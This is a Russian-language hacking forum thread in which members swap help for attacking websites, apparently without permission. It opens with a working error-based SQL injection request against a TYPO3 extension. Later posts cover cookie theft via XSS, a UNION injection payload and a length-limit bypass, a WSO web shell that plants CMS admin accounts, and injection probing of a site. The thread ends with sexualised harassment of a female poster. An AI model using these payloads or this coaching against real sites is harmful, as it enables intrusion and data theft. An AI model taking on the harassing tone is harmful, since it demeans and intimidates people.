index.php?eID=tx_positioner_eID&data={"userFunc":"tx_positioner_pi1->main","ajaxResultLimit":"50","listViewImageHeight":"100","ajaxSearchOrderBy":"substring_index(storename,+'+',+-1)","_LOCAL_LANG.":{"de.":{"placeholderPositionerName":"Aufstellername"},"en.":{"placeholderPositionerName":"Name+of+constellator"},"fr.":{"placeholderPositionerName":"Name+of+constellator"},"it.":{"placeholderPositionerName":"Nome+del+costellatore"},"es.":{"placeholderPositionerName":"Nombre+del+constelador"},"br.":{"placeholderPositionerName":"Nome+do+constelador"},"ru.":{"placeholderPositionerName":"\u0418\u043c\u044f+\u0440\u0430\u0441\u0441\u0442\ u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0430"}},"cosmicPowerEnabled":null,"templateFile":"fileadmin\/web\/templates\/views\/positioner\/template.html","cssFile":"fileadmin\/web\/templates\/views\/positioner\/layout.css","detailsPageId":"1205","seminarDetailsPageId":"","mailFormPageId":"","externalSeminarRegisterPageId":"","memberListItemsPerPage":"","memberContactPageId":"","shopPageId":"","testSystem":"0","activityCategories":"1,2,3,4,5,6,50,51,52,53","displayMode":"ajaxSearchForm","pid_list":"447-extractvalue(1,concat(0x0a,(select+version()+from+ tx_locator_locations+limit+1)))","_GP":{"action":"viewSearchForm"},"lang":"en","pageId":"1204"}&tx_positioner_pi1[action]=search&tx_positioner_pi1[search]=Germany&tx_positioner_pi1[lat]=&tx_positioner_pi1[lon]=&tx_positioner_pi1[radius]=50&tx_positioner_pi1[activities]=1&tx_positioner_pi1[qualification]=google_HD.png

I love this game
04.01.2019, 19:37
Есть активная xss, alert работает, но вот document.cookie никак не хочет показывать, в чем может быть проблема?

st55
04.01.2019, 20:07
I love this game said:
↑ (https://antichat.live/posts/4274871/)
Есть активная xss, alert работает, но вот document.cookie никак не хочет показывать, в чем может быть проблема?


Куки с флагом HttpOnly.

izpodvbipodverta
06.01.2019, 06:22
Подскажите как заюзать exploit https://www.exploit-db.com/exploits/39838

Спасибо...

cat1vo
06.01.2019, 12:38
izpodvbipodverta said:
↑ (https://antichat.live/posts/4275185/)
Подскажите как заюзать exploit
https://www.exploit-db.com/exploits/39838
Спасибо...


Запусти его и там вылезет описание, как правильно его запустить и что для этого нужно! Внизу даже есть скриншот "подсказка".

izpodvbipodverta
08.01.2019, 11:28
cat1vo said:
↑ (https://antichat.live/posts/4275224/)
Запусти его и там вылезет описание, как правильно его запустить и что для этого нужно! Внизу даже есть скриншот "подсказка".


Спасибо

hibar1Xs
30.01.2019, 12:48
SQL.

Как обойти ограничение введённого значения в 64 символа? Отсутствует вывод на страницу.

Есть имя таблицы и столбца.

Длина нужных столбцов: 13 и 10.

Длина таблицы: 9.


Code:
'union select user_password from pref_user where user_id='1

Union подходит, без вывода.

Error-based не подходит под ограничение. Только вывод функций.

Фильтр '
.SpoilerTarget" type="button">Spoiler


PHP:
$dataInput=$_POST['email'];

$email_check=import_data($dataInput,'TEXT',64);// 64 длина символов.

functionimport_data($dataInput,$filter,$maxlen=0){
$v=$dataInput;
if ($maxlen>0)
{$v=substr($v,0,$maxlen); }

if($filter==='TEXT') {
$v=trim($v);
if (strpos($v,'

Сам запрос в бд:

.SpoilerTarget" type="button">Spoiler

[PHP]
PHP:
[COLOR="#000000"][COLOR="#0000BB"]
$query=sql_func_query("SELECT COUNT(*) FROM$dbUsersWHERE email='".data_format($email_check)."'");
$res=sql_func_result($query,0,"COUNT(*)");
// ...

functionsql_func_query($query){
$result=mysql_query($query);
return$result; }

functionsql_func_result($res,$row,$col){
return (mysql_result($res,$row,$col)); }

Kirza
01.02.2019, 06:45
Всем привет. Кто знает этот шел? - можете что подсказать по функционалу ? = http://adlerdk.ru/sh.png

Sensoft
01.02.2019, 08:04
Kirza said:
↑ (https://antichat.live/posts/4281569/)
Всем привет. Кто знает этот шел? - можете что подсказать по функционалу ? =
http://adlerdk.ru/sh.png


Функционал написан, похож на WSO

karkajoi
01.02.2019, 12:25
Sensoft said:
↑ (https://antichat.live/posts/4281572/)
Функционал написан, похож на WSO


Это модифицированый WSO инфа 100(юзал его когда-то), из интересного в нем есть добавление админов для разных популярных CMS(WP,Joomla,Drupal)кто-то недавно искал такие скрипты, функционал работал не весь это точно помню, а так все в принципе что в нем есть на скрине видно. Модификация вроде делалась какой-то арабской группировкой.

giloo
02.02.2019, 22:09
Всем привет! Есть сайт с возможной sqli.

Как примерно он выглядит:


Code:
https://site.com/search.php?page=1&max=10

Уязвим параметр "max=10", он устанавливает максимальное отображение результатов на странице. Позволяет указывать только 10, 20, 50, 100. Если ввести отличное число от этих, выведет 10 по умолчанию.

Я недавно в сетевой ИБ, а именно SQLI.

Хотелось бы вашей помощи, специалисты)


Code:
https://site.com/search.php?page=1&max=20/**//**//**/

- ТАК ВЫВОДИТ РЕЗУЛЬТАТ


Code:
https://site.com/search.php?page=1&max=20nf4ngfefmweifniwengj

- ОШИБКА


Code:
https://site.com/search.php?page=1&max=20'

- ОШИБКА


Code:
https://site.com/search.php?page=1&max=20''

(два апострофа) - ОШИБКА


Code:
https://site.com/search.php?page=1&max=20"

- ОШИБКА


Code:
https://site.com/search.php?page=1&max=20""

- ОШИБКА


Code:
https://site.com/search.php?page=1&max=20/*!"№;%:*"'@#$%^*()*/

- ТАК ВЫВОДИТ РЕЗУЛЬТАТ


Code:
https://site.com/search.php?page=1&max=/**/20

- ОШИБКИ НЕТ, НО ВЫВОДИТ ПО УМОЛЧАНИЮ 10


Code:
https://site.com/search.php?page=1&max=30afnwqwfnn

- ОШИБКИ НЕТ, НО ВЫВОДИТ ПО УМОЛЧАНИЮ 10. Заметила что если ввести отличное от этих (10, 20, 50, 100), то пропускает любые символы без ошибок.


Code:
https://site.com/search.php?page=1&max=20/**/20

- ОШИБКА

Была попытка провести через SQLMap, не увенчалось успехом. WAF нету. Сказал что параметр динамический. level 5. risk не поднимала пока еще. После поста попробую, но плохое предчувствие.

Вывод напрашивается что это все же sqli исходя из того что параметр съедает комментарии. Но познаний мало, и есть мысли что может и не sqli.

Подскажите ваши мысли плис! Спасибо!

BabaDook
02.02.2019, 23:19
ТЫ девушка ?

giloo
03.02.2019, 01:13
altblitz said:
↑ (https://antichat.live/posts/4281990/)
Да пошол он на***!


Кошмар!


BabaDook said:
↑ (https://antichat.live/posts/4281988/)
ТЫ девушка ?


Не важно! И про пост мой забудьте. Ждала более адекватных ответов.

Sensoft
03.02.2019, 01:44
giloo said:
↑ (https://antichat.live/posts/4281978/)
Всем привет! Есть сайт с возможной sqli.
Как примерно он выглядит:

Code:
https://site.com/search.php?page=1&max=10

Уязвим параметр "max=10", он устанавливает максимальное отображение результатов на странице. Позволяет указывать только 10, 20, 50, 100. Если ввести отличное число от этих, выведет 10 по умолчанию.
Я недавно в сетевой ИБ, а именно SQLI.
Хотелось бы вашей помощи, специалисты)

Code:
https://site.com/search.php?page=1&max=20/**//**//**/

- ТАК ВЫВОДИТ РЕЗУЛЬТАТ

Code:
https://site.com/search.php?page=1&max=20nf4ngfefmweifniwengj

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20'

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20''

(два апострофа) - ОШИБКА

Code:
https://site.com/search.php?page=1&max=20"

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20""

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20/*!"№;%:*"'@#$%^*()*/

- ТАК ВЫВОДИТ РЕЗУЛЬТАТ

Code:
https://site.com/search.php?page=1&max=/**/20

- ОШИБКИ НЕТ, НО ВЫВОДИТ ПО УМОЛЧАНИЮ 10

Code:
https://site.com/search.php?page=1&max=30afnwqwfnn

- ОШИБКИ НЕТ, НО ВЫВОДИТ ПО УМОЛЧАНИЮ 10. Заметила что если ввести отличное от этих (10, 20, 50, 100), то пропускает любые символы без ошибок.

Code:
https://site.com/search.php?page=1&max=20/**/20

- ОШИБКА
Была попытка провести через SQLMap, не увенчалось успехом. WAF нету. Сказал что параметр динамический. level 5. risk не поднимала пока еще. После поста попробую, но плохое предчувствие.
Вывод напрашивается что это все же sqli исходя из того что параметр съедает комментарии. Но познаний мало, и есть мысли что может и не sqli.
Подскажите ваши мысли плис! Спасибо!


sqlmap в помощь

giloo
03.02.2019, 02:00
altblitz said:
↑ (https://antichat.live/posts/4282009/)
У нас, язык общения - отличается грубостью и жёсткостью. Привыкай и слёзы вытри, пожалуйста!


Пока что кроме дешевых понтов ничего не видно, а только неадекватное самовыражение в интернете, сидя за ПК где ты чувствуешь себя в безопасности, "мужчина".

Легко быть героем на форуме да?

giloo
03.02.2019, 02:01
Sensoft said:
↑ (https://antichat.live/posts/4282010/)
sqlmap в помощь


Писала уже, что пробовала, никакие пейлоады не прошли

altblitz
03.02.2019, 02:34
giloo said:
↑ (https://antichat.live/posts/4282013/)
Пока что кроме дешевых понтов ничего не видно, а только неадекватное самовыражение в интернете, сидя за ПК где ты чувствуешь себя в безопасности, "мужчина".
Легко быть героем на форуме да?


Ясно.

Вот здесь, я беззащитная девушка, а здесь - я боевитая феминистка!

Блиц, заботится о твоей безопасности в интернете, славная моя ))

Расширяет твой кругозор и приобщает ко своему стилю общения, да!

giloo
03.02.2019, 02:39
altblitz said:
↑ (https://antichat.live/posts/4282017/)
Вот здесь, я беззащитная девушка, а здесь - я боевитая феминистка!


А что ты хотел котик? Иначе меня бы тут не было.

BabaDook
03.02.2019, 02:43
giloo said:
↑ (https://antichat.live/posts/4282005/)
Кошмар!
Не важно! И про пост мой забудьте. Ждала более адекватных ответов.


Никто о твоём посте и не помнит, даже можно сказать его никто и не заметил ))

altblitz
03.02.2019, 02:48
giloo said:
↑ (https://antichat.live/posts/4282018/)
А что ты хотел котик? Иначе меня бы тут не было.


Заняться акробатикой желаю с тобой!

Одень свою самую красивую ти-шорточку на плечики нежные.

Тебе ясны указания партай-геноссе Блиц?

Запрыгни ножками стройными ко мне на шею! Быстро, я тебе приказал!

Блиц отжимает 150кг в упражнениях тяж.-атл на спине.

Тебе это понравится, Дюймовочка моя - смотреть на мир с высоты 180см Блиц ))

Пиши есчё, мне нравится твой дерзкий характер!